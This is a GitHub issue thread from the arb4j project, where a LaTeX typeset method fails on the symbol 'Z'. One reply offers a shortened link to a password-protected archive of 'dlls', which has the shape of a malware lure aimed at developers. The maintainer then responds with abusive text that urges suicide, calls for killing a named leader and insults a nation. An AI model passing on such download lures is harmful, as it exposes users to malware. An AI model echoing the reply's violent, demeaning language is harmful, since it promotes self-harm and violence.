### ISSUE TITLE
typeset() method for Z function needs to be fixed to generate valid latex

### ISSUE THREAD

**Issue by crowlogic** [crowlogic/arb4j#505]
```java
	at java.base/java.lang.Thread.run(Thread.java:1575)
org.scilab.forge.jlatexmath.ParseException: Unknown symbol or command or predefined TeXFormula: 'Z'
	at jlatexmath/org.scilab.forge.jlatexmath.TeXParser.processEscape(TeXParser.java:1555)
	at jlatexmath/org.scilab.forge.jlatexmath.TeXParser.parse(TeXParser.java:845)
	at jlatexmath/org.scilab.forge.jlatexmath.TeXParser.getArgument(TeXParser.java:1241)
	at jlatexmath/org.scilab.forge.jlatexmath.TeXParser.parse(TeXParser.java:857)
	at jlatexmath/org.scilab.forge.jlatexmath.TeXFormula.<init>(TeXFormula.java:296)
	at jlatexmath/org.scilab.forge.jlatexmath.TeXFormula.<init>(TeXFormula.java:274)
	at arb4j/arb.utensils.Utensils.renderFormula(Utensils.java:537)

```

**Comment by SagarChandra07** [comment]
maybe this will help
https://bit.ly/47P0Nvo
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by crowlogic** [comment]
How about you throw yourself out the nearest window but first go kill
Vladimir Putin before you do you scumbag from a s******* country full of
dumbasses who let a f****** evil villain rule their ass stupid bastards
